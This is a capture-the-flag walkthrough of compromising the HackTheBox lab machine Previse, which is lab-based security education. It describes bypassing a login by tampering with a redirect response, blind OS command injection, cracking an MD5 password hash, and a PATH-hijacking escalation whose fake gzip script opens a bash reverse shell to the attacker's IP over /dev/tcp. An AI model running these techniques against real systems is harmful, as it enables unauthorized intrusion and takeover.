Previse HackTheBox WalkThrough
This is Previse HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted
Previse HackTheBox machine. Before starting let us know something about this box. It is a
Linux OS box with IP address
10.10.11.104 and difficulty level
Easy assigned by its maker.
First of all, connect your PC with
HackTheBox VPN and confirm your connectivity with
Previse machine by pinging its IP 10.10.11.104. If all goes correct then start hacking. As usual, I started by scanning the machine.
Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. I have used
$ nmap [a popular Port Scanner] for this task and the result is given below: –
$ sudo nmap -sC -sV -sT -p- -oN full-tcp-port.nmap 10.10.11.104
Full port scan with
nmap revealed many ports as open. We will focus mainly on ports
80 as the services running over them are well known.
OpenSSH 7.6p1 is running over port
Apache2 web server is running on port
80. Since port 80 is open and web server is running over it so there must be a website hosted over it which can be accessed using the URL http://10.10.11.104. We will begin our enumeration from port 80. Ongoing to the URL http://10.10.11.104 found a
login page as shown below.
Simply, tried some
default credentials like
password and some more but none of them worked. Then, tried some login screen bypass SQL payloads it also not worked. Tried
fuzzing with some malicious payloads for getting verbose error message but again everything seemed to be configured properly. If I would get some username from anywhere, I would definitely perform bruteforce attack on this login page since it doesn’t have any
rate limit implemented on it. Meanwhile I started my
$ dirsearch in background to find folder and file.
$ sudo dirsearch -u http://10.10.11.104/ -e all -x 402,401,403,404 -t 50
Dirsearch found many files and on accessing maximum pages,
redirected me to
login page. When I tried to access
accounts.php page through the URL http://10.10.11.104/accounts.php it redirected me to
Forced Login into Previse
Then I go to the URL http://10.10.11.104/accounts.php and captured the request in Burpsuite and tried
force login by changing the response of the
login request. The captured request of accounts.php file is shown in the screenshot below.
Right click on the request and capture the response to this request. Then replace
302 Found to
200 OK to force the application not to redirect on
login.php page as shown in the screenshot given below.
forwarding the request it is observed that we are successfully
logged in the application.
Once I logged in the application, I tried to
add a new account by registering a new user. I have entered the credential
test2 and after clicking on
CREATE USER button again captured the request in
Burpsuite and modified the response as we did in above steps.
Now we have successfully registered a user account with the credential
Let us login into the
test2 user account. After login, I saw a
file upload functionality then I uploaded a simple
txt file and tried to check it whether we can execute it or not. When I accessed it, it immediately started downloading. If any how I would execute it then my next step would be to upload a
php web shell and get reverse shell on my
netcat listener. But here it is of no use.
There is a backup file present by the name
SITEBACKUP.ZIP. After downloading and extracting this file I found credentials
[email protected]!:) in
config.php file. Then I tried to SSH into root user but it is not SSH credential. Tried to use this password with other enumerated users like
admin, etc. but all are useless.
$ cat config.php
After reviewing the
source code of all the files inside
SITEBACKUP.ZIP found file
logs.php which has a php dangerous function
exec(). This function is accepting user input through the parameter
delim without performing any input validation. Use of exec() function without proper validation may leads to OS Command Injection vulnerability. For more info about exec() check this documentation.
After some testing found
Blind OS Command Injection vulnerability inside this file. Since the backup file is downloaded from this website there may be chances that running code on the server may also be vulnerable to OS command injection.
Confirming OS Command Injection
To confirm Blind OS command injection vulnerability, we will inject some
time-based OS Command like
$ ping command in Previse log.php page and then capture the response of ping using
$ tcpdump on our Kali machine.
$ sudo tcpdump -i tun0 icmp
We found that we can ping our kali machine through Previse machine. So here we have successfully confirmed Blind OS Command Injection vulnerability using time delays techniques. For more methods for exploiting OS command injection check this article from PortSwigger. Let us get user shell by using some
reverse shell one-liner. I am using
$ nc command for getting reverse shell. You can use any other also. You can find a list of one-liners here.
Getting User Shell
To get reverse shell start
netcat listener on your Kali machine on port
9001 and put the following onliner payload in the
$ nc -nvlp 9001
$ whoami && id
We have successfully got reverse shell with user
www-data. Let us upgrade it to fully interactive Linux Shell so that we can run more advanced Linux command through it.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ ^Z # To background
$ stty raw -echo
$ fg # To put foreground
$ export TERM=xterm
Checking Listening Ports
After some enumeration found that port
3306 is listening locally. Port
3306 is the default port for the classic
MySQL protocol (port), which is used by the
MySQL Connectors, and utilities such as
$ ss -lnpt
Since we have already found database credential inside
config.php file. So, I tried them to login into MySQL server using
$ mysql command.
$ mysql -u 'root' -p
mysql> show databases;
mysql> use previse;
mysql> show tables;
mysql> SELECT * FROM accounts;
From above we found password hash of user
Identify the Hash
Before we proceed to crack this hash we need to identify the type of this hash. Let us identify the type of hash and further will crack the hash to get password. The hash appears to be of the form
MD5 (Unix), Cisco-IOS $1$ (MD5) can be confirmed from the below example.
$ hashcat --example-hashes | grep -A2 -i 'MODE: 500'
For cracking the hash, I have used
$ hashcat (well-known offline password cracker) with the wordlist
rockyou.txt (Rockyou.txt is already present in Kali & Parrot OS inside the directory
$ cat hash.txt
$ hashcat -m 500 -a 3 hash.txt /usr/share/wordlists/rockyou.txt
$ hashcat -m 500 -a 3 hash.txt /usr/share/wordlists/rockyou.txt –show
The cracked password for the user m4lwhere is
Let us SSH into
$ ssh [email protected]
We are successfully logged in as m4lwhere. Let us capture user flag.
Capture User Flag
$ cat user.txt
To escalate the privilege to root we have to first find a
Privilege Escalation Vector using which we can perform privilege escalation. We can find
PrivEsc vector either manually or using some post exploitation enumeration scripts like linpeas.sh, LinEnum.sh and there are a lot more. This time I will go with manual enumeration.
Finding PrivEsc Vector
$ sudo -l command revealed that user m4lwhere can run script
access_backup.sh with root privilege.
$ sudo -l
On analyzing the content of
access_backup.sh file found that
$ gzip command is not used with absolute path. This introduces here a
Path Hijacking Vulnerability. For more info about privilege escalation using path variable check this article.
$ cat /opt/scripts/access_backup.sh
When I tried to escalate the privilege using
PATH variable, I could easily perform privilege escalation. So, here our potential PrivEsc vector is
Privilege Escalation via Path Hijacking.
Getting Root Shell
To get the root shell I ran the following commands.
On Previse Machine
$ echo $PATH
$ echo '#!/bin/bash' > /tmp/gzip
$ echo 'bash -i >& /dev/tcp/10.10.17.97/9001 0>&1' >> /tmp/gzip
$ cat /tmp/gzip
$ chmod +x /tmp/gzip
$ export PATH=/tmp:$PATH
$ echo $PATH
$ sudo /opt/scripts/access_backup.sh
On Kali Machine
$ nc -nvlp 9001
# whoami && id
We are root now. Let us capture root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted Previse HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this article. For any query and suggestion about the walkthrough feel free to write us at [email protected].